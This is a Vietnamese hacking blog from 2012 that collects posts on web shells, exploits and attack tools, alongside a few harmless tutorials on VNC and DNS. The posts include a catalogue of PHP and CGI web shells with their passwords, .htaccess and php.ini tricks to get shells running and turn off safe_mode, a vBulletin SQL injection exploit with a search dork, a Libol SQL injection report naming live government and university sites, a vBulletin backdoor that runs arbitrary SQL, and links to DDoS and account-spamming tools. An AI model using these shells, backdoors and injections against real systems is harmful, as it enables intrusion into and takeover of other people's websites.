e. Creat Project. Sau đó, bạn sẽ có 1 trang tương tự như: https://code.google.com/p/minhmeofiles/f. Nhấn vào Tab Downloads >>> New download. Rồi lựa chọn files cần upload (không quá 100 MB)g. Lựa chọn file lưu trữ là Js file.Up load file js của mình lên.h. Upload xong, bạn có thấy đường link tải files bạn vừa up.

Download>New Download

Nhấp chuột trái vào file js lấy link download nhúng vào blog_> Ẹnjoy ^^ 

Tạo 1 tài khoản tại http://sites.google.com/ >Tạo trang web mới

Sau đó bạn upload file js lên>Tài liệu đính kèm>Tải lên

Lấy link file js (Chuột phải vào download chọn copy link) nhúng vào blog :)

Theo mình thì các bạn nên dùng GC vì tốc độ load rất nhanh !

Nguồn sưu tầm

Dùng Google Code, Google Site làm host chứa file js

By: MIN Software on: 9:06 AM

Thursday, June 28, 2012

Nói đến local là nói đến shell, không có shell thì chỉ local bằng niềm tin. Hôm nay soleil giới thiệu một số loại shell thông dụng không thể thiếu trong local attack.

Một số shell thông dụng:

r57.php
R57 hiện nay đang là shell thông dụng, được sử dụng phổ biến nhất với hầu như là đầy đủ các tính năng.

c99.php
Nói đến r57 cũng không thể  không nhắc đến c99 với các thao tác có sẵn trên shell mà không cần phải sử dụng lệnh: edit, del, insert, drop… đặc biệt là có khả năng dump cơ sở dữ liệu!


byg.php
Byg hiện đang là shell mà được soleil sử dụng nhiều nhất với các chức năng có sẵn và thao tác dễ sử dụng


pass login: byg
         
         vhb.php

     Con shell này đã được soleil Edit và Deveple bằng chính con shell Byg.php trên với 1 số tính năng mạnh hơn và giao diện đẹp, bắt mắt hơn. Đây là con shell chính mà soleil thường sử dụng nhất.
  
http://www.mediafire.com/?hr9acl1yd1eabcw 

    Pass login: vhb
soleil.pin
Nếu Server Safe_mod: ON,  cả shell r57 và c99 đều không có chức năng run command để thực thi các câu lệnh, vậy làm sao có thể local được. Giải pháp được nghĩ đến là sử dụng shell cgi mà chức năng chính của nó là thực thi các câu lệnh.
 Pass login: ducdung.08clc
Cách sử dụng:
-          Up shell soleil.pin và CHMOD nó về 755
-          Up hoặc tạo file .htaccess có nội dung:
## START ##
Options +ExecCGI
AddHandler cgi-script cgi pl cgi gmc pin jpg
RewriteEngine on
RewriteRule (.*)\.mil$ $1.cgi
Options +FollowSymLinks
DirectoryIndex cmd.html
Options +Indexes
RemoveHandler .hack
AddType text/plain .hack
## milw0rmvn exploit ##
Hoặc:
Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .cin
AddHandler cgi-script .pin
AddHandler cgi-script .pin

telnet.php
Để sử dụng shell cgi được thuận tiên hơn, soleil giới thiệu shell telnet.pl. Chức năng hoàn toàn tương tự với con shell soleil.pin
Tuy nhiên cách thức sử dụng nó thì đơn giản hơn nhiều vì không phải sử dụng đến file .htaccess mà chỉ cần CHMOD nó về 755 là run ngon.

Fake symlink:

Get user:

Get user và domain
 
Shell này cần chmod về 755 trước khi sử dụng

Get all config
 
SSI
 
Backdoor.php
 
Netcut

zipcode.php
 
r57bypass.php (vip)
 
Check Shell : Kiểm tra shell có trên site
 
Priv8_2012.php
 
saoluu.php
Shell xml: Up shell đối với vbulletin
 
root.tar.gz: Dùng để symlink root hay indirect symlink.
* Và rất nhiều shell khác  với 1 số tính năng đặc biệt khác nữa.
...
Pass Unlock (all link): soleil_vhb
Nguồn: Hồ Đức Dũng's Blog
Hiệu chỉnh bởi Juno_okyo.

Tổng hợp Shell và giới thiệu tính năng!

By: MIN Software on: 6:51 PM

Vulnerability Master 1.0 Released By MaxPain

By: MIN Software on: 6:14 PM
Tool ICMP attack by puride



http://www.mediafire.com/?95n4k32bi448smc

Pass UnRAR : hisoka

666 attack tools

By: MIN Software on: 6:12 PM

Hôm nay sau một thời gian dài dùng VPS chẳng biết gì, giờ mới động đến các khái niệm SSH và Telnet việc đầu tiên là đi tìm các tập lênh cơ bản trong SSH. Dưới đây là một số tập lệnh cơ bản và ý nghĩa của các tập lệnh mời các bạn tham khảo.


ĐỌC TIẾP »

Các lệnh cơ bản của SSH – Tips sử dụng VPS Linux

By: MIN Software on: 6:09 PM

Description

NOWASP (Mutillidae) is a free, open source web application provided to allow security enthusiest to pen-test a web application. NOWASP (Mutillidae) can be installed on Linux, Windows XP, and Windows 7 using XAMMP making it easy for users who do not want to administrate a webserver. It is already installed on Samurai WTF and Rapid7 Metasploitable-2. The existing version can be updated on either. NOWASP (Mutillidae) contains dozens of vulns and hints to help the user; providing an easy-to-use web hacking environment deliberately designed to be used as a lab for security enthusiast, classrooms, labs, and vulnerability assessment tool targets. Mutillidae has been used in graduate security courses, in corporate web sec training courses, and as an "assess the assessor" target for vulnerability assessment software.

NOWASP (Mutillidae) has been tested/attacked with Cenzic Hailstorm ARC, W3AF, SQLMAP, Samurai WTF, Backtrack, HP Web Inspect, Burp-Suite, NetSparker Community Edition, and oth
NOWASP (Mutillidae) Web Site

Features


  • Mutillidae can be installed on Linux, Windows XP, and Windows 7 using XAMMP making it easy for users who do not want to install or administrate their own webserver.
  • Installs easily by dropping project files into the "htdocs" folder of XAMPP.
  • Preinstalled on Rapid7 Metasploitable 2
  • Preinstalled on Samurai Web Testing Framework (WTF)
  • Has dozen of vulnerablities and challenges. Contains at least one vulnearbility for each of the OWASP Top Ten 2007 and 2010
  • System can be restored to default with single-click of "Setup" button
  • Switches between secure and insecure mode
  • Secure and insecure source code for each page stored in the same PHP file for easy comparison
  • Used in graduate security courses, in corporate web sec training courses, and as an "assess the assessor" target for vulnerability software
  • Contains 2 levels of hints to help users get started
  • Instructional Videos: http://www.youtube.com/user/webpwnized
  • Updates tweeted to @webpwnized
  • Mutillidae has been tested/attacked with Cenzic Hailstorm ARC, W3AF, SQLMAP, Samurai WTF, Backtrack, HP Web Inspect, Burp-Suite, NetSparker Community Edition, and other tools
Download:
http://sourceforge.net/projects/mutillidae/

NOWASP (Mutillidae) Web Pen-Test Practice Application

By: MIN Software on: 9:14 AM

Facebook Bot Like & Unlike

By: MIN Software on: 5:09 AM
Download: http://www.mediafire.com/?jn8v53zs2rdvexd
Attacker:  sangteamtham

Get Root 24h.com.vn

By: MIN Software on: 4:46 AM
Phần Mềm: Thư viện điện tử - Thư viện số Libol
Phiên Bản: <= 5.5
Vendor: CÔNG TY CỔ PHẦN CÔNG NGHỆ TINH VÂN
Bug Report: MSSQL Injection Vulnerability.
Mức Độ : Critical

1.Mô tả chung:
Libol (LIBrary OnLine), bộ phần mềm giải pháp Thư viện điện tử - Thư viện số được Tinh Vân nghiên cứu và phát triển từ năm 1997, là sản phẩm phần mềm thư viện điện tử và quản lý tích hợp nghiệp vụ thư viện thành công nhất ở Việt Nam.
Phần mềm này được các trường học sử dụng nhiều, đặc biệt là các trường Đại Học, nên mức độ ảnh hưởng rất lớn.
2.Thông tin về lỗi:
MSSQL Injection cho phép hacker khai thác thong tin về đăng nhập, các thông tin quan trọng của website, nhằm chiếm đoạt quyền điều khiển máy chủ, websites, tiến hành cài đặt và phát tán mã độc.
Module bị ảnh hưởng:
1.Module Search:
Vị Trí: search/location.asp
Ở location.asp, 2 ID là Tai_lieu_ID và Kho_ID do không được filter các kí tự đặc biệt.
Demo:
http://www.lic.vnu.vn:8080/Libol55/s...803310670&Gia=
2. Module Login:
Vì không được lọc các kí tứ đặc biệt khi insert vào form, điều này cho phép hacker khai thác thông tin, update thông tin một cách dễ dàng qua phương thức POST.
Vị Trí: http://victim.com/admin/logon.asp
HTTP Header:
----------------------------------------------------------------------------------------------------------

Code:
Host: victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0.2) Gecko/20100101 Firefox/6.0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://victim.com/admin/logon.asp
Cookie: ASPSESSIONIDCACDCDTR=HAHFJONADOABKNAPNPFIAHJC
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
-----------------------------------------------------------------------------------------------------------
Post content
-----------------------------------------------------------------------------------------------------------
Code:
User=%27&Pass=&func=Authen
Và lỗi MSSQL sẽ là:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near 'pltMrViNNHNL6'.
/admin/logon.asp, line 71
-----------------------------------------------------------------------------------------------------------

Demo:
http://thuvien.mard.gov.vn/admin/logon.asp


3.Kết Luận: Lỗi MSSQL injection gầy hậu qua nghiêm trọng đối với website. Nếu trường hợp mà user có quền SA thì hậu quả còn nghiệm trọng hơn nữa. Người dùng có thể yêu cầu nhà cung cấp phần mềm để cập nhập lên bản mới nhất. Lỗi này sẽ sớm được cập nhập trên các website như securityfocus.com, exploit-db.com .. một khi phần mềm này đã được cập nhập bản vá.

Bug này đã cùng Vncert liên hệ với vendor, Vendor thừa nhận lỗi, nhưng sau đó không đưa ra thông tin bản vá gì. Đã quá lâu rồi nên hnay quyết định publish.

Nguồn: HCE Group

Thư viện điện tử - Thư viện số Libol

By: MIN Software on: 4:32 AM
################################################## ######
#
# Exploit Title : vBulletin 4.1.10 Sql Injection Vulnerabilitiy
#
# Author : IrIsT.Ir
#
# Discovered By : Am!r
#
# Home : http://IrIsT.Ir
#
# Software Link : http://vbulletin.com
#
# Security Risk : High
#
# Version : All Version
#
# Tested on : GNU/Linux Ubuntu - Windows Server - win7
#
# Dork : "Powered By Vbulletin"
#
################################################## ######
#
# Expl0iTs :
#
# [TarGeT]/announcement.php?a=&announcementid=[Sql]
#
################################################## #######
#
# Greats : Zarbat.Org - Aria-Security.Com - datacoders.org - black-hg.org
#
# Security7.ir - AjaxTm.Com - Sepehr-Team.Org And All Iranian Hackers
#
################################################## #######

vBulletin 4.1.10 SQL Injection

By: MIN Software on: 4:25 AM

Nguồn: Sưu tầm :)

Tổng hợp 1 vài eBook Hacking

By: MIN Software on: 4:23 AM

Admin page finder v2

By: MIN Software on: 3:59 AM

Wednesday, June 27, 2012

Yêu cầu: .Net Framework 2.0


 
Đánh capcha xong click cập nhật, tạo đủ nick rùi thì click lưu... reg đến lúc limit thì đổi sever khác hoặc change ip đễ reg típ...

http://www.mediafire.com/?nkc6d17db64rby2

Tool reg nick Yahoo nhanh!!!

By: MIN Software on: 3:28 AM

Tuesday, June 26, 2012

Tình hình mới vọc cái này xong,viết cái tut cho AE ai chưa cài đặt được thì cài chơi
duyệt web trên vps sướng lắm

Đầu tiên login vào SSH nhé (khuyên dùng Tunnelier nhé)

Bước 1: Cài X Windows System (KDE và GNOME Desktop Environement!)
yum groupinstall "X Window System" "GNOME Desktop Environment"
Đến đoạn nó hỏi Y/n cứ Y rồi ngồi đợi xíu

Chờ xíu nó Complete là được.

Sau khi cài đặt xong GNOME Desktop Environnement,chúng ta chuyển qua KDE chạy lệnh :
yum groupinstall "X Window System" "KDE (K Desktop Environment)"
Đến đoạn nó hỏi Y/n cứ Y rồi ngồi đợi xíu

Bước 2 : Cài đặt VNC Server :
yum install vnc-server
Đợi xíu cài xong nó sẽ báo

Bước 3 : Chỉnh config của VNC Server

Edit file vnc server, chạy lệnh :
vi /etc/sysconfig/vncservers
Nếu ai biết sử dụng Linux rồi thì ko nói , còn ai ko biết thì mở SFTP của tunnelier lên,download file đó về,mở = notepad++ , xong edit : Bỏ 2 dấu # ở 2 câu cuối cùng:
# The VNCSERVERS variable is a list of display:user pairs.
#
# Uncomment the lines below to start a VNC server on display :2
# as my 'myusername' (adjust this to your own). You will also
# need to set a VNC password; run 'man vncpasswd' to see how
# to do that.
#
# DO NOT RUN THIS SERVICE if your local area network is
# untrusted! For a secure way of using VNC, see
# <URL:http://www.uk.research.att.com/archive/vnc/sshvnc.html>.

# Use "-nolisten tcp" to prevent X connections to your VNC server via TCP.

# Use "-nohttpd" to prevent web-based VNC clients connecting.

# Use "-localhost" to prevent remote VNC clients connecting except when
# doing so through a secure tunnel. See the "-via" option in the
# `man vncviewer' manual page.

VNCSERVERS="1:root"
VNCSERVERARGS[1]="-geometry 1024x768"
Save lại rồi up đè lên file cũ trên server.

Bước 4 : Khởi động VNC Server:
vncserver
Chạy cái này nó sẽ kiu đặt pass khi vào remote desktop.

Lưu ý: linux khi nhập pass nó sẽ ko ra dấu *** như windows mà nó ẩn xuống, nên các bạn cứ nhập xong bấm enter rồi verify lại 1 lần nữa.

Bước 4 : Sửa file xstartup
vi /root/.vnc/xstartup
Bỏ 2 dấu thăngs ở 2 đoạn như code dưới :
unset SESSION_MANAGER
exec /etc/X11/xinit/xinitrc
Còn đây là đoạn code đúng luôn,ai ko biết sửa thì copy cái này vào
#!/bin/sh

# Uncomment the following two lines for normal desktop:
unset SESSION_MANAGER
exec /etc/X11/xinit/xinitrc

[ -x /etc/vnc/xstartup ] && exec /etc/vnc/xstartup
[ -r $HOME/.Xresources ] && xrdb $HOME/.Xresources
xsetroot -solid grey
vncconfig -iconic &
xterm -geometry 80x24+10+10 -ls -title "$VNCDESKTOP Desktop" &
twm &
Bước 5 : Khởi động lại vnc server :
/etc/init.d/vncserver restart
Bước 6 : Khởi động khi bật máy:
chkconfig vncserver on

Bước 7 : Tắt firewall
/etc/init.d/iptables stop
Bước 8 : Tắt firewall khi bật máy
chkconfig iptables off
Xong download file này về chạy theo dạng:
http://www.mediafire.com/?jzw8c51zrp6zj5l
Pass: vanmaihuong-byg
IPserver:1
Demo khi chạy remote desktop linux đây:
http://i942.photobucket.com/albums/ad269/juno_okyo/GhostClub-4rum/vps.png

Cách cài remote Desktop cho VPS linux

By: MIN Software on: 4:18 PM
Tut khai khác, up shell, local host windowns dành cho người bắt đầu học hack
trong video có nhiều câu kéo lủng củng, các bác bỏ quá cho tut dành cho newbie, pro tránh xa

http://www.mediafire.com/?uvj4iv00bg0conj

Tut khai khác, up shell, local host windowns

By: MIN Software on: 7:35 AM
Đây là Ebook CNTT toàn tập là hàng hiếm của dân CNTT đó anh em,dành cho những ai thích công nghệ thông tin thì tham khảo. Trong này chứa hầu như tất cả những món nghề của dân CNTT.
 
Mời các bạn download:
http://www.mediafire.com/?t3yzw8cnq4qfs

Bộ Ebook cực hiếm dành cho dân CNTT!

By: MIN Software on: 7:33 AM
Khi gặp Safe_mode: ON thường ae ko làm được gì (ý nói newbie á). Jin lập Tut này hướng dẫn ae local khi gặp trường hợp này.
-- Bắt đầu nha --
I. Hạ safe_mode
Thử các cách sau:
a. Tạo file .htaccess ở root với nội dung sau:

Code:
php_flag safe_mode off
b. Tạo file php.ini ở root với nội dung sau:
Code:
safe_mode = Off
c. Thêm đoạn code sau vào file cấu hình như config.php , data.php , global.php ,.. ( sau <?php nhé )
Code:
ini_set('safe_mode','Off');
Sau khi hạ safe_mode xong thì local như thường nhé.
II. Perl Shell
Nếu vì lí do nào đó mà bạn ko hạ sm được thì dùng thử Perl Shell nha. Perl Shell là shell (tất nhiên rùi) thường có đuôi dạng .cgi , .pl ,.. Và ko bị ảnh hưởng bởi cái sm quái qủy kia.
Download: http://www.hyperfileshare.com/d/1508da2e
Upload shell to host, ChMod 755 và run thử.
Nếu gặp lỗi 500 thì ta xem Tut này: http://www.mediafire.com/?mmnimgwmjt0 (mượn tạm của pro nào ý)
và Tut này http://www.mediafire.com/?qqwkoiozrdq
nếu ko được nữa thì move shell vào folder cgi-bin .
Cuối cùng, áp dụng hết pp trên mà ko được nữa thì... Bỏ con shell ấy đi. Hại não. Hìhì

TUT - Làm gì khi safe_mode ON?

By: MIN Software on: 2:37 AM

Monday, June 25, 2012

Screenshot:

http://s14.postimage.org/qfmtsljjj/Screen_shot_2012_06_25_at_21_35_24.png


Khả năng : Run query SQL tùy thích qua con backdoor (Select, Update, Drop ....)

Cách sử dụng

Quote:
+ Up thẳng vào thư mục forum vBB (ngang hàng với index.php).
+ Run: http://site.com/forum/backdoor.php?vnh= Câu lệnh sql

hoặc

+ Admincp -> Product & Plugin Manager -> Add new plugin ->
- Hook Location : tùy thích (mình hay dùng faq_complete)
- Plugin PHP Code : Copy nguyên code ở dưới vào, bỏ "<?php" ở đầu và "?>" ở cuối đi
- Plugin is active : Yes
+ Run : http://site.com/forum/faq.php?vnh= Câu lệnh sql
Download:
http://www.mediafire.com/?y9yz0gm6r4e4uxr
 Nguồn: VNHack.

Hidden Baby cho vBulletin (all version)

By: MIN Software on: 7:11 PM

[TUT] How To Open Your Ports

By: MIN Software on: 9:09 AM
Tình hình dạo này truy cập Blogger khó quá mà ko hiểu nguyên nhân ( lúc dc lúc không , bực cả mình )
Tham khảo 1 số bài về tình hình này , 1 số người "đổ oan" cho VNPT "không cho phép truy cập vào blogger" . Nhưng thực tế nếu đã chặn thì chặn ngay từ đầu chứ đâu phải lúc này (không vào dc) mới nói là chặn . Tìm hiểu thêm từ 1 số nguồn khác thì có thể nói như sau : do DNS của VNPT 203.162.4.190, 191 rất hay lỗi, nên lâu lâu không vào được Blogger (hoặc 1 số website khác) phải đổi sang DNS khác mới Okie => lỗi DNS của VNPT (?)
(Ở đây DCM đang nói đến VNPT vì đang dùng mạng của VNPT , còn 1 số như FPT hay Viettel thì ko rõ)

Cách khắc phục tình trạng trên ?
Cũng tham khảo từ 1 số nguồn , DCM thấy cách tốt nhất nên thay đổi DNS khi truy cập vào BLogger (hoặc 1 số website khác).

Open DNS

Đây là cách đơn giản nhất để thay đổi DNS nhằm tăng tốc độ cho trình duyệt: Sử dụng miễn phí, các máy chủ DNS chạy cực nhanh theo dịch vụ của OpenDNS thay vì dùng máy chủ DNS của ISP. OpenDNS có một nơi lưu trữ DNS khổng lồ, với nhiều máy chủ DNS rải rác trên thế giới. Vì vậy, bạn hoàn toàn có thể tìm được địa chỉ IP giúp bạn vào net nhanh hơn so với các máy chủ DNS của ISP.

Các địa chỉ của máy chủ OpenDNS là 208.67.222.222 (máy chủ DNS chính) và 208.67.220.220 (máy chủ DNS phụ).

Để sử dụng các máy chủ OpenDNS, bạn sẽ phải thay đổi một chút trong thiết lập máy tính. Nếu đang sử dụng Windows XP, đầu tiên bạn chọn Control Panel --> Network and Internet Connections --> Network Connections, kích chuột phải vào kết nối mạng trong cửa sổ Network Connections, chọn Properties. Hộp thoại như hình dưới xuất hiện :


Chọn Internet Protocol (TCP/IP) và kích vào Properties


Trong danh sách cuộn xuống, bạn hãy chọn Internet Protocol (TCP/IP) và kích vào Properties. Trong phần phía dưới của cửa sổ mới xuất hiện, chọn "Use the following DNS server addresses". Tại phần the Preferred DNS server nhập vào địa chỉ 208.67.222.222. Tại phần Alternative DNS server nhập vào địa chỉ 208.67.220.220 (hình dưới). Kích OK, kích Close và Close lần nữa để đóng hết các cửa sổ. Khởi động lại máy tính để các thiết lập bắt đầu có hiệu lực.


Nhập vào địa chỉ để báo cho máy tính biết bạn sử dụng máy chủ OpenDNS


Nếu sử dụng Windows Vista, chọn Control Panel --> Network and Internet --> Network and Sharing Center. Kích vào kết nối View Status trên phần bên phải của màn hình. Màn hình Local Connection Status xuất hiện như hình dưới, kích chọn Properties :


Kích vào Properties để thiết lập sử dụng OpenDNS

Bạn sẽ gặp hộp thoại tương tự như trong Windows XP để thiết lập sử dụng máy chủ OpenDNS.

Sau khi áp dụng cách này thì hầu như bất cứ lúc nào cũng truy cập dc blogger (1 số lần do dường truyền , "nguyên nhận phụ" ... nên ko vào dc )
Nếu ai đã từng gặp trường hợp này hãy thử dùng cách trên xem thế nào .
Have Fun !

Tăng tốc độ Net (Open DNS)

By: MIN Software on: 4:58 AM

 

Our Team Members

Copyright © hacker va bao mat | Designed by Templateism.com | WPResearcher.com